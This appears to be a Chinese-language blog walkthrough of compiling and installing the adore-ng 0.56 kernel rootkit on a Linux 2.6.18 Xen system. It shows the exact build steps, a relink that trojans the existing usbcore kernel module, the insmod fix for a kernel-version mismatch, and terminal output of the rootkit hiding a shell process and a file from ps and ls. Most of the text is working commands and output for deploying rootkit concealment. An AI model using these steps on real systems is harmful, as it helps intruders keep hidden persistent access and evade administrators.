rootkit(1)－adore-ng0.56在Linux2.6應用

自己機器是fc8
#uname -r
2.6.18.8-xen

源碼在/home/sploving/xen

1. 下載adore-ng-0.56
2. cp Makefile.2.6 Makefile
並修改相應的項，以適應自己的內核版本。
3. make
4. ./relink
[root@localhost adore-ng-0.56-wztfix]# ./relink26

This script may be used to relink adore into
already existing LKMs on the system. This is the Kernel 2.6
version of 'relink'. Note that -DRELINKED has to be switched on
in the Makefile. Modules compiled with this switch cant work stand alone.

The following LKMs are available:


fuse ipt_MASQUERADE iptable_nat ip_nat bridge
bnep rfcomm l2cap bluetooth autofs4
sunrpc ipt_REJECT iptable_filter ip_tables xt_state
ip_conntrack nfnetlink xt_tcpudp ip6t_ipv6header ip6t_REJECT
ip6table_filter ip6_tables x_tables ipv6 ib_iser
rdma_cm ib_addr ib_cm ib_sa ib_mad
ib_core iscsi_tcp libiscsi scsi_transport_iscsi binfmt_misc
dm_mirror dm_multipath dm_mod snd_hda_intel snd_hda_codec
snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device
snd_pcm_oss snd_mixer_oss tsdev snd_pcm evdev
i2c_i801 usbhid snd_timer pcspkr serio_raw
i2c_core 8250_pci 8250_pnp shpchp snd
8250 parport_pc soundcore pci_hotplug serial_core
parport snd_page_alloc sg sr_mod cdrom
rtc ahci libata sd_mod scsi_mod
ext3 jbd uhci_hcd ohci_hcd ehci_hcd
usbcore

Chose one:
選擇一個usbcore
Choice was >>>usbcore<<<
Searching for usbcore.ko ...
Found /lib/modules/2.6.18.8-xen/kernel/drivers/usb/core/usbcore.ko!

Copy trojaned LKM back to original LKM? (y/n)
y

5.insmod  adore-ng-2.6.ko
出現如下錯誤：
insmod: error inserting 'adore-ng-2.6.o': -1 Invalid module format
問題是內核版本不同。應該是makefiles設置的內核版本不對.
修改makefile 將
KERNEL_SOURCE=/usr/src/kernel/2.6.23.1-42.fc8-i686改爲：
KERNEL_SOURCE=/home/sploving/xen/build-linux-2.6.18-xen_x86_32

6. ./ava I
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.

成功安裝！下面開始應用此rootkit來隱藏相應的文件。

7.隱藏進程：
[root@localhost adore-ng-0.56-wztfix]# ps
  PID TTY          TIME CMD
 3957 pts/0    00:00:00 su
 3960 pts/0    00:00:00 bash
 5028 pts/0    00:00:00 ps

[root@localhost adore-ng-0.56-wztfix]# ./ava i 3960
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.
Made PID 3960 invisible.

[root@localhost adore-ng-0.56-wztfix]# ps
  PID TTY          TIME CMD
 3957 pts/0    00:00:00 su
8.隱藏文件：
[root@localhost adore-ng-0.56-wztfix]# ls
errors temp
[root@localhost adore-ng-0.56-wztfix]# ./ava h errors
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.
File 'errors' is now hidden.
[root@localhost adore-ng-0.56-wztfix]# ls
temp